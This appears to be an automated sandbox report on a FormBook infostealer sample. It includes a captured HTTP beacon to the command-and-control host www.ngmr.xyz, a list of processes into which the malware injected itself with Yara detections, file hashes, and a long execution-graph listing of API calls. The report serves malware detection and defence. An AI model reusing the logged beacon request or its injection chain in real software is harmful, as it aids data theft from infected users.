                                          Dec 5, 2024 18:23:17.453905106 CET509OUTGET /qj8y/?DTs4CD4=VLsx0gmXQ4Y/FgugnqZTvhP9ZMzds9qWdo+Du/rvWhX0yMPY213bdk6OAmkXBQAvHZvuSU6Z1Lmt8KkEin8FkCRkth5DL64qsZwfe0mtTtD39/jv9X5U82qLTQbZ+JYXlg==&v4=NRh8 HTTP/1.1
                                          Host: www.ngmr.xyz
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.9
                                          Connection: close
                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                          Dec 5, 2024 18:23:18.683528900 CET550INHTTP/1.1 404 Not Found
                                          Content-Type: text/html; charset=iso-8859-1
                                          Content-Length: 282
                                          Accept-Ranges: bytes
                                          Date: Thu, 05 Dec 2024 17:46:40 GMT
                                          X-Varnish: 1252442421
                                          Age: 0
                                          Via: 1.1 varnish
                                          Connection: close
                                          X-Varnish-Cache: MISS
                                          Server: C2M Server v1.02
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 71 6a 38 79 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /qj8y/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>


                                          Statistics

                                          CPU Usage

                                          Click to jump to process

                                          Memory Usage

                                          Click to jump to process

                                          High Level Behavior Distribution

                                          Click to dive into process behavior distribution

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          General

                                          Target ID:0
                                          Start time:12:21:08
                                          Start date:05/12/2024
                                          Path:C:\Users\user\Desktop\s7Okni1gfE.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\s7Okni1gfE.exe"
                                          Imagebase:0x800000
                                          File size:1'226'752 bytes
                                          MD5 hash:19730719A742EE889C6BD0B9E635D234
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:true

                                          General

                                          Target ID:2
                                          Start time:12:21:09
                                          Start date:05/12/2024
                                          Path:C:\Windows\SysWOW64\svchost.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\s7Okni1gfE.exe"
                                          Imagebase:0xb10000
                                          File size:46'504 bytes
                                          MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1960347440.0000000002B20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1960347440.0000000002B20000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1960938102.0000000003350000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1960938102.0000000003350000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1959958040.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1959958040.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:6
                                          Start time:12:21:51
                                          Start date:05/12/2024
                                          Path:C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe"
                                          Imagebase:0x7f0000
                                          File size:140'800 bytes
                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2718155143.0000000002A80000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.2718155143.0000000002A80000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                          Reputation:high
                                          Has exited:false

                                          General

                                          Target ID:7
                                          Start time:12:21:52
                                          Start date:05/12/2024
                                          Path:C:\Windows\SysWOW64\clip.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\SysWOW64\clip.exe"
                                          Imagebase:0x4d0000
                                          File size:24'576 bytes
                                          MD5 hash:E40CB198EBCD20CD16739F670D4D7B74
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2717771387.0000000004800000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.2717771387.0000000004800000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2714904794.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.2714904794.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2715513437.0000000002F00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.2715513437.0000000002F00000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                          Reputation:moderate
                                          Has exited:false

                                          General

                                          Target ID:8
                                          Start time:12:22:06
                                          Start date:05/12/2024
                                          Path:C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe"
                                          Imagebase:0x7f0000
                                          File size:140'800 bytes
                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2717205821.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.2717205821.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                          Reputation:high
                                          Has exited:false

                                          General

                                          Target ID:10
                                          Start time:12:22:18
                                          Start date:05/12/2024
                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                          Imagebase:0x7ff6d20e0000
                                          File size:676'768 bytes
                                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Disassembly

                                          Reset < >

                                            Execution Graph

                                            Execution Coverage:3.8%
                                            Dynamic/Decrypted Code Coverage:0.9%
                                            Signature Coverage:7.2%
                                            Total number of Nodes:1992
                                            Total number of Limit Nodes:70
                                            execution_graph 93724 879c06 93735 81d3be 93724->93735 93726 879c1c 93734 879c91 Mailbox 93726->93734 93770 801caa 49 API calls 93726->93770 93730 879cc5 93732 87a7ab Mailbox 93730->93732 93772 84cc5c 86 API calls 4 library calls 93730->93772 93731 879c71 93731->93730 93771 84b171 48 API calls 93731->93771 93744 813200 93734->93744 93736 81d3ca 93735->93736 93737 81d3dc 93735->93737 93773 80dcae 50 API calls Mailbox 93736->93773 93739 81d3e2 93737->93739 93740 81d40b 93737->93740 93774 81f4ea 93739->93774 93783 80dcae 50 API calls Mailbox 93740->93783 93743 81d3d4 93743->93726 93806 80bd30 93744->93806 93746 813267 93767 813313 Mailbox ___crtGetEnvironmentStringsW 93746->93767 93880 81c36b 86 API calls 93746->93880 93750 80fe30 331 API calls 93750->93767 93758 81c3c3 48 API calls 93758->93767 93759 84cc5c 86 API calls 93759->93767 93763 81f4ea 48 API calls 93763->93767 93764 81c2d6 48 API calls 93764->93767 93767->93750 93767->93758 93767->93759 93767->93763 93767->93764 93768 80dcae 50 API calls 93767->93768 93769 813635 Mailbox 93767->93769 93811 802b7a 93767->93811 93818 80e8d0 93767->93818 93881 80d9a0 53 API calls __cinit 93767->93881 93882 80d8c0 53 API calls 93767->93882 93883 80d645 93767->93883 93893 85f320 331 API calls 93767->93893 93894 85f5ee 331 API calls 93767->93894 93895 801caa 49 API calls 93767->93895 93896 85cda2 82 API calls Mailbox 93767->93896 93897 8480e3 53 API calls 93767->93897 93898 80d764 55 API calls 93767->93898 93899 80d6e9 93767->93899 93903 84c942 50 API calls 93767->93903 93904 806eed 93767->93904 93768->93767 93769->93730 93770->93731 93771->93734 93772->93732 93773->93743 93777 81f4f2 __calloc_impl 93774->93777 93776 81f50c 93776->93743 93777->93776 93778 81f50e std::exception::exception 93777->93778 93784 82395c 93777->93784 93798 826805 RaiseException 93778->93798 93780 81f538 93799 82673b 47 API calls _free 93780->93799 93782 81f54a 93782->93743 93783->93743 93785 8239d7 __calloc_impl 93784->93785 93791 823968 __calloc_impl 93784->93791 93805 827c0e 47 API calls __getptd_noexit 93785->93805 93786 823973 93786->93791 93800 8281c2 47 API calls __NMSG_WRITE 93786->93800 93801 82821f 47 API calls 5 library calls 93786->93801 93802 821145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 93786->93802 93789 8239cf 93789->93777 93790 82399b RtlAllocateHeap 93790->93789 93790->93791 93791->93786 93791->93790 93793 8239c3 93791->93793 93796 8239c1 93791->93796 93803 827c0e 47 API calls __getptd_noexit 93793->93803 93804 827c0e 47 API calls __getptd_noexit 93796->93804 93798->93780 93799->93782 93800->93786 93801->93786 93803->93796 93804->93789 93805->93789 93807 80bd3f 93806->93807 93810 80bd5a 93806->93810 93908 80bdfa 93807->93908 93809 80bd47 CharUpperBuffW 93809->93810 93810->93746 93812 802b8b 93811->93812 93813 87436a 93811->93813 93814 81f4ea 48 API calls 93812->93814 93815 802b92 93814->93815 93816 802bb3 93815->93816 93925 802bce 48 API calls 93815->93925 93816->93767 93819 80e8f6 93818->93819 93879 80e906 Mailbox 93818->93879 93821 80ed52 93819->93821 93819->93879 93820 84cc5c 86 API calls 93820->93879 94020 81e3cd 331 API calls 93821->94020 93823 80ebdd 93823->93767 93825 80ed63 93825->93823 93826 80ed70 93825->93826 94022 81e312 331 API calls Mailbox 93826->94022 93827 80e94c PeekMessageW 93827->93879 93829 87526e Sleep 93829->93879 93830 80ed77 LockWindowUpdate DestroyWindow 93832 80ed93 GetMessageW 93830->93832 93832->93823 93834 80eda9 93832->93834 93833 80ebc7 93833->93823 94021 802ff6 16 API calls 93833->94021 93837 8759ef TranslateMessage DispatchMessageW GetMessageW 93834->93837 93836 80ed21 PeekMessageW 93836->93879 93837->93837 93840 875a1f 93837->93840 93838 801caa 49 API calls 93838->93879 93839 80ebf7 timeGetTime 93839->93879 93840->93823 93842 806eed 48 API calls 93842->93879 93843 81f4ea 48 API calls 93843->93879 93844 875557 WaitForSingleObject 93847 875574 GetExitCodeProcess CloseHandle 93844->93847 93844->93879 93845 80ed3a TranslateMessage DispatchMessageW 93845->93836 93846 87588f Sleep 93875 875429 Mailbox 93846->93875 93847->93879 93849 80edae timeGetTime 94023 801caa 49 API calls 93849->94023 93850 875733 Sleep 93850->93875 93854 875926 GetExitCodeProcess 93859 875952 CloseHandle 93854->93859 93860 87593c WaitForSingleObject 93854->93860 93856 802aae 307 API calls 93856->93879 93857 81dc38 timeGetTime 93857->93875 93858 875445 Sleep 93858->93879 93859->93875 93860->93859 93860->93879 93861 875432 Sleep 93861->93858 93862 868c4b 108 API calls 93862->93875 93863 802c79 107 API calls 93863->93875 93865 8759ae Sleep 93865->93879 93871 80d6e9 55 API calls 93871->93875 93874 813200 307 API calls 93874->93879 93875->93854 93875->93857 93875->93858 93875->93861 93875->93862 93875->93863 93875->93865 93875->93871 93875->93879 94025 80d7f7 93875->94025 94030 844cbe 49 API calls Mailbox 93875->94030 94031 801caa 49 API calls 93875->94031 94032 80ce19 93875->94032 94038 802aae 331 API calls 93875->94038 94068 85ccb2 50 API calls 93875->94068 94069 847a58 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 93875->94069 94070 846532 63 API calls 3 library calls 93875->94070 93877 80ce19 48 API calls 93877->93879 93878 80d6e9 55 API calls 93878->93879 93879->93820 93879->93827 93879->93829 93879->93833 93879->93836 93879->93838 93879->93839 93879->93842 93879->93843 93879->93844 93879->93845 93879->93846 93879->93849 93879->93850 93879->93856 93879->93858 93879->93874 93879->93875 93879->93877 93879->93878 93926 80f110 93879->93926 93991 8145e0 93879->93991 94008 81e244 93879->94008 94013 81dc5f 93879->94013 94018 80eed0 331 API calls Mailbox 93879->94018 94019 80ef00 331 API calls 93879->94019 94024 868d23 48 API calls 93879->94024 94039 80fe30 93879->94039 93880->93767 93881->93767 93882->93767 93884 80d654 93883->93884 93892 80d67e 93883->93892 93885 80d65b 93884->93885 93888 80d6c2 93884->93888 93886 80d6ab 93885->93886 93887 80d666 93885->93887 93886->93892 94971 81dce0 53 API calls 93886->94971 94970 80d9a0 53 API calls __cinit 93887->94970 93888->93886 94972 81dce0 53 API calls 93888->94972 93892->93767 93893->93767 93894->93767 93895->93767 93896->93767 93897->93767 93898->93767 93900 80d6f4 93899->93900 93901 80d71b 93900->93901 94973 80d764 55 API calls 93900->94973 93901->93767 93903->93767 93905 806f00 93904->93905 93906 806ef8 93904->93906 93905->93767 94974 80dd47 48 API calls ___crtGetEnvironmentStringsW 93906->94974 93909 80be0d 93908->93909 93913 80be0a ___crtGetEnvironmentStringsW 93908->93913 93910 81f4ea 48 API calls 93909->93910 93911 80be17 93910->93911 93914 81ee75 93911->93914 93913->93809 93916 81f4ea __calloc_impl 93914->93916 93915 82395c __malloc_crt 47 API calls 93915->93916 93916->93915 93917 81f50c 93916->93917 93918 81f50e std::exception::exception 93916->93918 93917->93913 93923 826805 RaiseException 93918->93923 93920 81f538 93924 82673b 47 API calls _free 93920->93924 93922 81f54a 93922->93913 93923->93920 93924->93922 93925->93816 93927 80f130 93926->93927 93930 80fe30 331 API calls 93927->93930 93934 80f199 93927->93934 93928 80f3dd 93931 8787c8 93928->93931 93942 80f3f2 93928->93942 93975 80f431 Mailbox 93928->93975 93929 80f595 93935 80d7f7 48 API calls 93929->93935 93929->93975 93932 878728 93930->93932 94091 84cc5c 86 API calls 4 library calls 93931->94091 93932->93934 94088 84cc5c 86 API calls 4 library calls 93932->94088 93934->93928 93934->93929 93938 80d7f7 48 API calls 93934->93938 93970 80f229 93934->93970 93937 8787a3 93935->93937 94090 820f0a 52 API calls __cinit 93937->94090 93940 878772 93938->93940 93939 878b1b 93957 878bcf 93939->93957 93958 878b2c 93939->93958 94089 820f0a 52 API calls __cinit 93940->94089 93968 80f418 93942->93968 94092 849af1 48 API calls 93942->94092 93943 80f770 93951 878a45 93943->93951 93969 80f77a 93943->93969 93945 80d6e9 55 API calls 93945->93975 93947 878c53 94106 84cc5c 86 API calls 4 library calls 93947->94106 93948 878810 94093 85eef8 331 API calls 93948->94093 93949 80fe30 331 API calls 93971 80f6aa 93949->93971 93950 84cc5c 86 API calls 93950->93975 94098 81c1af 48 API calls 93951->94098 93952 878b7e 94101 85e40a 331 API calls Mailbox 93952->94101 94103 84cc5c 86 API calls 4 library calls 93957->94103 94100 85f5ee 331 API calls 93958->94100 93959 878beb 94104 85bdbd 331 API calls Mailbox 93959->94104 93961 80fe30 331 API calls 93961->93975 93964 811b90 48 API calls 93964->93975 93967 878c00 93989 80f537 Mailbox 93967->93989 94105 84cc5c 86 API calls 4 library calls 93967->94105 93968->93939 93968->93971 93968->93975 94071 811b90 93969->94071 93970->93928 93970->93929 93970->93968 93970->93975 93971->93943 93971->93949 93972 80fce0 93971->93972 93971->93975 93971->93989 93972->93989 94102 84cc5c 86 API calls 4 library calls 93972->94102 93974 878823 93974->93968 93978 87884b 93974->93978 93975->93945 93975->93947 93975->93950 93975->93952 93975->93959 93975->93961 93975->93964 93975->93972 93975->93989 94087 80dd47 48 API calls ___crtGetEnvironmentStringsW 93975->94087 94099 8397ed InterlockedDecrement 93975->94099 94107 81c1af 48 API calls 93975->94107 94094 85ccdc 48 API calls 93978->94094 93980 878857 93982 878865 93980->93982 93983 8788aa 93980->93983 94095 849b72 48 API calls 93982->94095 93986 8788a0 Mailbox 93983->93986 94096 84a69d 48 API calls 93983->94096 93984 80fe30 331 API calls 93984->93989 93986->93984 93988 8788e7 94097 80bc74 48 API calls 93988->94097 93989->93879 93992 814637 93991->93992 93993 81479f 93991->93993 93994 876e05 93992->93994 93995 814643 93992->93995 93996 80ce19 48 API calls 93993->93996 94184 85e822 331 API calls Mailbox 93994->94184 94110 814300 93995->94110 94003 8146e4 Mailbox 93996->94003 93999 876e11 94000 814739 Mailbox 93999->94000 94185 84cc5c 86 API calls 4 library calls 93999->94185 94000->93879 94002 814659 94002->93999 94002->94000 94002->94003 94125 804252 94003->94125 94131 84fa0c 94003->94131 94172 856ff0 94003->94172 94181 846524 94003->94181 94009 81e253 94008->94009 94010 87df42 94008->94010 94009->93879 94011 87df77 94010->94011 94012 87df59 TranslateAcceleratorW 94010->94012 94012->94009 94014 81dca3 94013->94014 94015 81dc71 94013->94015 94014->93879 94015->94014 94016 81dc96 IsDialogMessageW 94015->94016 94017 87dd1d GetClassLongW 94015->94017 94016->94014 94016->94015 94017->94015 94017->94016 94018->93879 94019->93879 94020->93833 94021->93825 94022->93830 94023->93879 94024->93879 94026 81f4ea 48 API calls 94025->94026 94027 80d818 94026->94027 94028 81f4ea 48 API calls 94027->94028 94029 80d826 94028->94029 94029->93875 94030->93875 94031->93875 94033 80ce28 __NMSG_WRITE 94032->94033 94034 81ee75 48 API calls 94033->94034 94035 80ce50 ___crtGetEnvironmentStringsW 94034->94035 94036 81f4ea 48 API calls 94035->94036 94037 80ce66 94036->94037 94037->93875 94038->93875 94040 80fe50 94039->94040 94064 80fe7e 94039->94064 94041 81f4ea 48 API calls 94040->94041 94041->94064 94042 81146e 94043 806eed 48 API calls 94042->94043 94065 80ffe1 94043->94065 94044 81f4ea 48 API calls 94044->94064 94045 8397ed InterlockedDecrement 94045->94064 94046 80d7f7 48 API calls 94046->94064 94047 810509 94964 84cc5c 86 API calls 4 library calls 94047->94964 94051 806eed 48 API calls 94051->94064 94052 87a922 94052->93879 94053 87a246 94055 806eed 48 API calls 94053->94055 94054 811473 94963 84cc5c 86 API calls 4 library calls 94054->94963 94055->94065 94058 87a873 94058->93879 94059 87a30e 94059->94065 94961 8397ed InterlockedDecrement 94059->94961 94060 820f0a 52 API calls __cinit 94060->94064 94062 87a973 94965 84cc5c 86 API calls 4 library calls 94062->94965 94064->94042 94064->94044 94064->94045 94064->94046 94064->94047 94064->94051 94064->94053 94064->94054 94064->94059 94064->94060 94064->94062 94064->94065 94067 8115b5 94064->94067 94946 811d10 94064->94946 94960 811820 331 API calls 2 library calls 94064->94960 94065->93879 94066 87a982 94962 84cc5c 86 API calls 4 library calls 94067->94962 94068->93875 94069->93875 94070->93875 94072 811cf6 94071->94072 94075 811ba2 94071->94075 94072->93975 94073 811bae 94079 811bb9 94073->94079 94109 81c15c 48 API calls 94073->94109 94075->94073 94076 81f4ea 48 API calls 94075->94076 94077 8749c4 94076->94077 94078 81f4ea 48 API calls 94077->94078 94086 8749cf 94078->94086 94080 811c5d 94079->94080 94081 81f4ea 48 API calls 94079->94081 94080->93975 94082 811c9f 94081->94082 94083 811cb2 94082->94083 94108 802925 48 API calls 94082->94108 94083->93975 94085 81f4ea 48 API calls 94085->94086 94086->94073 94086->94085 94087->93975 94088->93934 94089->93970 94090->93975 94091->93989 94092->93948 94093->93974 94094->93980 94095->93986 94096->93988 94097->93986 94098->93975 94099->93975 94100->93975 94101->93972 94102->93989 94103->93989 94104->93967 94105->93989 94106->93989 94107->93975 94108->94083 94109->94079 94111 876e60 94110->94111 94114 81432c 94110->94114 94187 84cc5c 86 API calls 4 library calls 94111->94187 94113 876e71 94188 84cc5c 86 API calls 4 library calls 94113->94188 94114->94113 94121 814366 ___crtGetEnvironmentStringsW 94114->94121 94116 814435 94122 814445 94116->94122 94186 85cda2 82 API calls Mailbox 94116->94186 94118 81f4ea 48 API calls 94118->94121 94119 8144b1 94119->94002 94120 80fe30 331 API calls 94120->94121 94121->94116 94121->94118 94121->94120 94121->94122 94123 876ebd 94121->94123 94122->94002 94189 84cc5c 86 API calls 4 library calls 94123->94189 94126 80425c 94125->94126 94128 804263 94125->94128 94190 8235e4 94126->94190 94129 804272 94128->94129 94130 804283 FreeLibrary 94128->94130 94129->94000 94130->94129 94132 84fa1c __ftell_nolock 94131->94132 94133 84fa44 94132->94133 94599 80d286 48 API calls 94132->94599 94496 80936c 94133->94496 94136 84fa5e 94137 84fa80 94136->94137 94138 84fb68 94136->94138 94147 84fb92 94136->94147 94139 80936c 81 API calls 94137->94139 94516 8041a9 94138->94516 94145 84fa8c _wcscpy _wcschr 94139->94145 94142 84fb8e 94143 80936c 81 API calls 94142->94143 94142->94147 94146 84fbc7 94143->94146 94144 8041a9 136 API calls 94144->94142 94151 84fab0 _wcscat _wcscpy 94145->94151 94155 84fade _wcscat 94145->94155 94540 821dfc 94146->94540 94147->94000 94149 80936c 81 API calls 94150 84fafc _wcscpy 94149->94150 94600 8472cb GetFileAttributesW 94150->94600 94153 80936c 81 API calls 94151->94153 94153->94155 94154 84fb1c __NMSG_WRITE 94154->94147 94157 80936c 81 API calls 94154->94157 94155->94149 94156 84fbeb _wcscat _wcscpy 94160 80936c 81 API calls 94156->94160 94158 84fb48 94157->94158 94601 8460dd 77 API calls 4 library calls 94158->94601 94162 84fc82 94160->94162 94161 84fb5c 94161->94147 94543 84690b 94162->94543 94164 84fca2 94165 846524 3 API calls 94164->94165 94166 84fcb1 94165->94166 94167 80936c 81 API calls 94166->94167 94170 84fce2 94166->94170 94168 84fccb 94167->94168 94549 84bfa4 94168->94549 94171 804252 84 API calls 94170->94171 94171->94147 94173 80936c 81 API calls 94172->94173 94174 85702a 94173->94174 94891 80b470 94174->94891 94176 85703a 94177 85705f 94176->94177 94178 80fe30 331 API calls 94176->94178 94180 857063 94177->94180 94919 80cdb9 48 API calls 94177->94919 94178->94177 94180->94000 94942 846ca9 GetFileAttributesW 94181->94942 94184->93999 94185->94000 94186->94119 94187->94113 94188->94122 94189->94122 94191 8235f0 __getstream 94190->94191 94192 823604 94191->94192 94193 82361c 94191->94193 94225 827c0e 47 API calls __getptd_noexit 94192->94225 94199 823614 __getstream 94193->94199 94203 824e1c 94193->94203 94195 823609 94226 826e10 8 API calls ___wstrgtold12_l 94195->94226 94199->94128 94204 824e4e EnterCriticalSection 94203->94204 94205 824e2c 94203->94205 94207 82362e 94204->94207 94205->94204 94206 824e34 94205->94206 94228 827cf4 94206->94228 94209 823578 94207->94209 94210 823587 94209->94210 94211 82359b 94209->94211 94313 827c0e 47 API calls __getptd_noexit 94210->94313 94214 823597 94211->94214 94273 822c84 94211->94273 94213 82358c 94314 826e10 8 API calls ___wstrgtold12_l 94213->94314 94227 823653 LeaveCriticalSection LeaveCriticalSection _fprintf 94214->94227 94221 8235b5 94290 82e9d2 94221->94290 94223 8235bb 94223->94214 94224 821c9d _free 47 API calls 94223->94224 94224->94214 94225->94195 94226->94199 94227->94199 94229 827d05 94228->94229 94230 827d18 EnterCriticalSection 94228->94230 94235 827d7c 94229->94235 94230->94207 94232 827d0b 94232->94230 94259 82115b 47 API calls 3 library calls 94232->94259 94236 827d88 __getstream 94235->94236 94237 827d91 94236->94237 94238 827da9 94236->94238 94260 8281c2 47 API calls __NMSG_WRITE 94237->94260 94239 827da7 94238->94239 94245 827e11 __getstream 94238->94245 94239->94238 94263 8269d0 47 API calls __malloc_crt 94239->94263 94242 827d96 94261 82821f 47 API calls 5 library calls 94242->94261 94243 827dbd 94246 827dd3 94243->94246 94247 827dc4 94243->94247 94245->94232 94250 827cf4 __lock 46 API calls 94246->94250 94264 827c0e 47 API calls __getptd_noexit 94247->94264 94248 827d9d 94262 821145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 94248->94262 94253 827dda 94250->94253 94252 827dc9 94252->94245 94254 827de9 InitializeCriticalSectionAndSpinCount 94253->94254 94255 827dfe 94253->94255 94256 827e04 94254->94256 94265 821c9d 94255->94265 94271 827e1a LeaveCriticalSection _doexit 94256->94271 94260->94242 94261->94248 94263->94243 94264->94252 94266 821ccf _free 94265->94266 94267 821ca6 RtlFreeHeap 94265->94267 94266->94256 94267->94266 94268 821cbb 94267->94268 94272 827c0e 47 API calls __getptd_noexit 94268->94272 94270 821cc1 GetLastError 94270->94266 94271->94245 94272->94270 94274 822c97 94273->94274 94278 822cbb 94273->94278 94275 822933 __fflush_nolock 47 API calls 94274->94275 94274->94278 94276 822cb4 94275->94276 94315 82af61 94276->94315 94279 82eb36 94278->94279 94280 8235af 94279->94280 94281 82eb43 94279->94281 94283 822933 94280->94283 94281->94280 94282 821c9d _free 47 API calls 94281->94282 94282->94280 94284 822952 94283->94284 94285 82293d 94283->94285 94284->94221 94452 827c0e 47 API calls __getptd_noexit 94285->94452 94287 822942 94453 826e10 8 API calls ___wstrgtold12_l 94287->94453 94289 82294d 94289->94221 94291 82e9de __getstream 94290->94291 94292 82e9e6 94291->94292 94293 82e9fe 94291->94293 94469 827bda 47 API calls __getptd_noexit 94292->94469 94295 82ea7b 94293->94295 94298 82ea28 94293->94298 94473 827bda 47 API calls __getptd_noexit 94295->94473 94296 82e9eb 94470 827c0e 47 API calls __getptd_noexit 94296->94470 94302 82a8ed ___lock_fhandle 49 API calls 94298->94302 94300 82ea80 94474 827c0e 47 API calls __getptd_noexit 94300->94474 94304 82ea2e 94302->94304 94303 82ea88 94475 826e10 8 API calls ___wstrgtold12_l 94303->94475 94306 82ea41 94304->94306 94307 82ea4c 94304->94307 94454 82ea9c 94306->94454 94471 827c0e 47 API calls __getptd_noexit 94307->94471 94309 82e9f3 __getstream 94309->94223 94311 82ea47 94472 82ea73 LeaveCriticalSection __unlock_fhandle 94311->94472 94313->94213 94314->94214 94316 82af6d __getstream 94315->94316 94317 82af75 94316->94317 94318 82af8d 94316->94318 94413 827bda 47 API calls __getptd_noexit 94317->94413 94319 82b022 94318->94319 94324 82afbf 94318->94324 94418 827bda 47 API calls __getptd_noexit 94319->94418 94322 82af7a 94414 827c0e 47 API calls __getptd_noexit 94322->94414 94323 82b027 94419 827c0e 47 API calls __getptd_noexit 94323->94419 94340 82a8ed 94324->94340 94328 82af82 __getstream 94328->94278 94329 82b02f 94420 826e10 8 API calls ___wstrgtold12_l 94329->94420 94330 82afc5 94332 82afeb 94330->94332 94333 82afd8 94330->94333 94415 827c0e 47 API calls __getptd_noexit 94332->94415 94349 82b043 94333->94349 94336 82afe4 94417 82b01a LeaveCriticalSection __unlock_fhandle 94336->94417 94337 82aff0 94416 827bda 47 API calls __getptd_noexit 94337->94416 94341 82a8f9 __getstream 94340->94341 94342 82a946 EnterCriticalSection 94341->94342 94344 827cf4 __lock 47 API calls 94341->94344 94343 82a96c __getstream 94342->94343 94343->94330 94345 82a91d 